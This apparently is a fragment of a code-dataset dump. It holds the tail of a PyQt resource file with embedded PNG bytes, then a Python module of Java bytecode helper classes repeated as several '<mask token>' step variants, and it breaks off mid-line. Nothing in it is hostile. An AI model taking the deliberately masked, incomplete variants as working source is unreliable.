\\xfc\\x42\\xeb\\x46\\x0d\\xb7\\xf6\\xd1\\xe5\\xce\\x8d\\x5c\\x1e\\x3e\\x2a\\\n\\x55\\xc1\\xf3\\xa0\\x3d\\xec\\xf1\\xce\\x70\\x8b\\x9d\\xd8\\xe1\\xfb\\xb0\\x5a\\\n\\xda\\xeb\\x2d\\x98\\x9d\\x57\\x37\\xb6\\x5b\\xb5\\x70\\x6f\\xab\\x76\\x57\\x94\\\n\\x17\\x81\\x73\\x61\\x14\\xaf\\x07\\x61\\xb4\\xe6\\x07\\xe1\\x49\\x55\\xe6\\x14\\\n\\x12\\x15\\x79\\x54\\xba\\xc3\\xbd\\xa2\\x78\\x80\\xaa\\xa0\\x82\\x35\\x45\\xde\\\n\\xa8\\x75\\xda\\x37\\x8b\\xb8\\x7b\\xed\\x73\\x4b\\xcb\\xd1\\xf2\\x74\\xfd\\xed\\\n\\xa7\\x1a\\xf7\\x2e\\xbf\\x76\\xf1\\xb9\\x3c\\x4c\\xcb\\xe5\\x62\\x7e\\xf9\\xd8\\\n\\x9b\\x5f\\xfb\\xfe\\x4b\\x6f\\x9e\\x9b\\xf2\\xc2\\x99\\xf9\\xc5\\xe9\\x85\\x95\\\n\\xe3\\x2b\\xe5\\xc9\\xa9\\xd5\\xb8\\x94\\x9e\\x89\\xe2\\xe4\\x4c\\x10\\x44\\x4f\\\n\\xf9\\x41\\xb0\\xec\\xfb\\x41\\x55\\x55\\x02\\x67\\x6d\\x6e\\x4d\\xb1\\x93\\xf5\\\n\\xfb\\xef\\x0f\\x07\\xfd\\x77\\x07\\xbd\\xee\\xd5\\x22\\xcf\\x6f\\xd5\\x61\\xf3\\\n\\xea\\xfb\\x57\\x9b\\xaa\\x97\\xf3\\x9b\\xcf\\x7d\\x9d\\x2f\\xff\\xec\\x0d\\xbc\\\n\\xc7\\xbe\\x37\\xcf\\x63\\x61\\xe5\\x38\\xa7\\xd7\\xd6\\xb9\\x70\\xf1\\x1b\\x5c\\\n\\xba\\x78\\xc1\\x07\\x2a\\x33\\xf3\\x4b\\x0b\\xd5\\x23\\xb3\\xa7\\xca\\xd5\\xa9\\\n\\xb5\\x3c\\xeb\\x2f\\xed\\xed\\xd4\\x6a\\xfd\\x76\\xe7\\xbe\\x31\\x45\\x03\\x68\\\n\\x01\\x9d\\xb1\\xb2\\xf5\\xa3\\x73\\xd2\\xec\\xb5\\xd8\\xec\\x58\\xfe\\xa7\\x08\\\n\\xa3\\x88\\x27\\x57\\x3f\\xc6\\xab\\xbf\\xbf\\x02\\xe0\\x03\\xd1\\x58\\xf1\\x58\\\n\\xe1\\xf8\\xfc\\xff\\x34\\xfe\\x09\\x50\\xc9\\xce\\x14\\x61\\x6a\\x10\\x46\\x00\\\n\\x00\\x00\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x63\\x72\\x65\\x61\\\n\\x74\\x65\\x00\\x32\\x30\\x32\\x30\\x2d\\x30\\x37\\x2d\\x31\\x39\\x54\\x30\\x33\\\n\\x3a\\x33\\x39\\x3a\\x31\\x39\\x2b\\x30\\x30\\x3a\\x30\\x30\\x9d\\x70\\x4c\\x6c\\\n\\x00\\x00\\x00\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x6d\\x6f\\x64\\\n\\x69\\x66\\x79\\x00\\x32\\x30\\x31\\x39\\x2d\\x30\\x31\\x2d\\x30\\x38\\x54\\x31\\\n\\x37\\x3a\\x35\\x34\\x3a\\x30\\x36\\x2b\\x30\\x30\\x3a\\x30\\x30\\xfa\\xae\\x64\\\n\\x88\\x00\\x00\\x00\\x20\\x74\\x45\\x58\\x74\\x73\\x6f\\x66\\x74\\x77\\x61\\x72\\\n\\x65\\x00\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x69\\x6d\\x61\\x67\\x65\\x6d\\\n\\x61\\x67\\x69\\x63\\x6b\\x2e\\x6f\\x72\\x67\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00\\\n\\x18\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x44\\x6f\\x63\\x75\\\n\\x6d\\x65\\x6e\\x74\\x3a\\x3a\\x50\\x61\\x67\\x65\\x73\\x00\\x31\\xa7\\xff\\xbb\\\n\\x2f\\x00\\x00\\x00\\x18\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\\n\\x49\\x6d\\x61\\x67\\x65\\x3a\\x3a\\x48\\x65\\x69\\x67\\x68\\x74\\x00\\x35\\x31\\\n\\x32\\x8f\\x8d\\x53\\x81\\x00\\x00\\x00\\x17\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\\n\\x6d\\x62\\x3a\\x3a\\x49\\x6d\\x61\\x67\\x65\\x3a\\x3a\\x57\\x69\\x64\\x74\\x68\\\n\\x00\\x35\\x31\\x32\\x1c\\x7c\\x03\\xdc\\x00\\x00\\x00\\x19\\x74\\x45\\x58\\x74\\\n\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x4d\\x69\\x6d\\x65\\x74\\x79\\x70\\x65\\x00\\\n\\x69\\x6d\\x61\\x67\\x65\\x2f\\x70\\x6e\\x67\\x3f\\xb2\\x56\\x4e\\x00\\x00\\x00\\\n\\x17\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x4d\\x54\\x69\\x6d\\\n\\x65\\x00\\x31\\x35\\x34\\x36\\x39\\x37\\x30\\x30\\x34\\x36\\xc4\\x38\\x95\\x8f\\\n\\x00\\x00\\x00\\x13\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x53\\\n\\x69\\x7a\\x65\\x00\\x31\\x35\\x32\\x30\\x39\\x38\\x42\\xe5\\x15\\x0c\\xcb\\x00\\\n\\x00\\x00\\x5a\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x55\\x52\\\n\\x49\\x00\\x66\\x69\\x6c\\x65\\x3a\\x2f\\x2f\\x2f\\x64\\x61\\x74\\x61\\x2f\\x77\\\n\\x77\\x77\\x72\\x6f\\x6f\\x74\\x2f\\x77\\x77\\x77\\x2e\\x65\\x61\\x73\\x79\\x69\\\n\\x63\\x6f\\x6e\\x2e\\x6e\\x65\\x74\\x2f\\x63\\x64\\x6e\\x2d\\x69\\x6d\\x67\\x2e\\\n\\x65\\x61\\x73\\x79\\x69\\x63\\x6f\\x6e\\x2e\\x63\\x6e\\x2f\\x66\\x69\\x6c\\x65\\\n\\x73\\x2f\\x31\\x30\\x36\\x2f\\x31\\x30\\x36\\x36\\x32\\x33\\x38\\x2e\\x70\\x6e\\\n\\x67\\x39\\x3a\\x2a\\x0d\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\\n\\x82\\\n\"\n\nqt_resource_name = b\"\\\n\\x00\\x03\\\n\\x00\\x00\\x77\\x47\\\n\\x00\\x70\\\n\\x00\\x6e\\x00\\x67\\\n\\x00\\x04\\\n\\x00\\x06\\xfa\\x5e\\\n\\x00\\x69\\\n\\x00\\x63\\x00\\x6f\\x00\\x6e\\\n\\x00\\x0b\\\n\\x05\\xff\\xda\\x07\\\n\\x00\\x31\\\n\\x00\\x31\\x00\\x33\\x00\\x37\\x00\\x32\\x00\\x36\\x00\\x34\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x0e\\\n\\x02\\xd3\\xb9\\x87\\\n\\x00\\x64\\\n\\x00\\x65\\x00\\x61\\x00\\x6c\\x00\\x20\\x00\\x73\\x00\\x6d\\x00\\x61\\x00\\x6c\\x00\\x6c\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x07\\\n\\x09\\xc7\\x57\\xa7\\\n\\x00\\x73\\\n\\x00\\x65\\x00\\x74\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x0b\\\n\\x0f\\x29\\x4e\\xc7\\\n\\x00\\x70\\\n\\x00\\x72\\x00\\x65\\x00\\x76\\x00\\x69\\x00\\x65\\x00\\x77\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\"\n\nqt_resource_struct_v1 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\\n\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\\n\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x58\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\\n\\x00\\x00\\x00\\x6c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc\\\n\"\n\nqt_resource_struct_v2 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\\n\\x00\\x00\\x01\\x74\\x56\\xe3\\x3f\\xc3\\\n\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\x68\\x2e\\xd5\\xff\\x38\\\n\\x00\\x00\\x00\\x58\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\\n\\x00\\x00\\x01\\x74\\xc4\\x73\\x3a\\x8f\\\n\\x00\\x00\\x00\\x6c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc\\\n\\x00\\x00\\x01\\x74\\xc4\\x73\\xad\\x43\\\n\"\n\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from ...java import opcodes as JavaOpcodes
from .primitives import ICONST_val
##########################################################################
# Common Java operations
##########################################################################
class New:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW(self.classname),
JavaOpcodes.DUP()
)
class Init:
def __init__(self, classname, *args):
self.classname = classname
self.args = args
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKESPECIAL(
self.classname,
'<init>',
args=self.args,
returns='V'
),
)
class Yield:
def __init__(self, yield_point):
self.yield_point = yield_point
def process(self, context):
context.add_opcodes(
ICONST_val(self.yield_point),
JavaOpcodes.INVOKEVIRTUAL(
'org/python/types/Generator',
'yield',
args=['Ljava/util/Map;', 'I'],
returns='V'
),
# "yield" by returning from the generator method.
JavaOpcodes.ARETURN()
)
##########################################################################
# Java types and their operations
##########################################################################
class Array:
def __init__(self, size, classname='org/python/Object', fill=None):
self.size = size
self.classname = classname
self.fill = fill
def process(self, context):
context.add_opcodes(
ICONST_val(self.size),
JavaOpcodes.ANEWARRAY(self.classname),
)
if self.fill:
for i in range(self.size):
context.add_opcodes(
JavaOpcodes.DUP(),
ICONST_val(i),
self.fill,
JavaOpcodes.AASTORE(),
)
class List:
def __init__(self, size=None):
self.size = size
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/ArrayList'),
JavaOpcodes.DUP(),
)
if self.size:
context.add_opcodes(
ICONST_val(self.size),
Init('java/util/ArrayList', 'I')
)
else:
context.add_opcodes(
Init('java/util/ArrayList')
)
class add:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/List',
'add',
args=['Ljava/lang/Object;'],
returns='Z'
),
JavaOpcodes.POP(),
)
class Map:
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/HashMap'),
JavaOpcodes.DUP(),
Init('java/util/HashMap')
)
class get:
def __init__(self, key):
self.key = key
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.key),
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'get',
args=['Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
)
)
class put:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'put',
args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
),
JavaOpcodes.POP()
)
class putAll:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'putAll',
args=['Ljava/util/Map;'],
returns='V'
),
)
class Class:
class forName:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.classname),
JavaOpcodes.INVOKESTATIC(
'java/lang/Class',
'forName',
args=['Ljava/lang/String;'],
returns='Ljava/lang/Class;'
),
)
class THROW:
# Raise an exception of given type with given arguments
# Example:
# THROW(
# 'org/python/exceptions/AttributeError',
# ['Ljava/lang/String;', JavaOpcodes.LDC_W("Invalid attribute")],
# )
def __init__(self, exception_class, *exception_args):
self.exception_class = exception_class
self.exc_arg_types = [e[0] for e in exception_args]
self.exc_arg_values = [e[1] for e in exception_args]
def process(self, context):
context.add_opcodes(
New(self.exception_class),
*self.exc_arg_values
)
context.add_opcodes(
Init(self.exception_class, *self.exc_arg_types),
JavaOpcodes.ATHROW(),
)
|
normal
|
{
"blob_id": "67e0536dc9f38ab82fe30e715599fed93c5425a5",
"index": 5142,
"step-1": "<mask token>\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-2": "<mask token>\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-3": "<mask token>\n\n\nclass Init:\n <mask token>\n <mask token>\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-4": "<mask token>\n\n\nclass Init:\n\n def __init__(self, classname, *args):\n self.classname = classname\n self.args = args\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKESPECIAL(self.classname,\n '<init>', args=self.args, returns='V'))\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-5": "from ...java import opcodes as JavaOpcodes\n\nfrom .primitives import ICONST_val\n\n\n##########################################################################\n# Common Java operations\n##########################################################################\n\nclass New:\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW(self.classname),\n JavaOpcodes.DUP()\n )\n\n\nclass Init:\n def __init__(self, classname, *args):\n self.classname = classname\n self.args = args\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKESPECIAL(\n self.classname,\n '<init>',\n args=self.args,\n returns='V'\n ),\n )\n\n\nclass Yield:\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(\n ICONST_val(self.yield_point),\n JavaOpcodes.INVOKEVIRTUAL(\n 'org/python/types/Generator',\n 'yield',\n args=['Ljava/util/Map;', 'I'],\n returns='V'\n ),\n # \"yield\" by returning from the generator method.\n JavaOpcodes.ARETURN()\n )\n\n\n##########################################################################\n# Java types and their operations\n##########################################################################\n\nclass Array:\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(\n ICONST_val(self.size),\n JavaOpcodes.ANEWARRAY(self.classname),\n )\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(\n JavaOpcodes.DUP(),\n ICONST_val(i),\n self.fill,\n JavaOpcodes.AASTORE(),\n )\n\n\nclass List:\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP(),\n )\n\n if self.size:\n context.add_opcodes(\n ICONST_val(self.size),\n Init('java/util/ArrayList', 'I')\n )\n else:\n context.add_opcodes(\n Init('java/util/ArrayList')\n )\n\n class add:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List',\n 'add',\n args=['Ljava/lang/Object;'],\n returns='Z'\n ),\n JavaOpcodes.POP(),\n )\n\n\nclass Map:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(),\n Init('java/util/HashMap')\n )\n\n class get:\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.LDC_W(self.key),\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'get',\n args=['Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'\n )\n )\n\n class put:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'put',\n args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'\n ),\n JavaOpcodes.POP()\n )\n\n class putAll:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'putAll',\n args=['Ljava/util/Map;'],\n returns='V'\n ),\n )\n\n\nclass Class:\n class forName:\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC(\n 'java/lang/Class',\n 'forName',\n args=['Ljava/lang/String;'],\n returns='Ljava/lang/Class;'\n ),\n )\n\n\nclass THROW:\n # Raise an exception of given type with given arguments\n # Example:\n # THROW(\n # 'org/python/exceptions/AttributeError',\n # ['Ljava/lang/String;', JavaOpcodes.LDC_W(\"Invalid attribute\")],\n # )\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(\n New(self.exception_class),\n *self.exc_arg_values\n )\n context.add_opcodes(\n Init(self.exception_class, 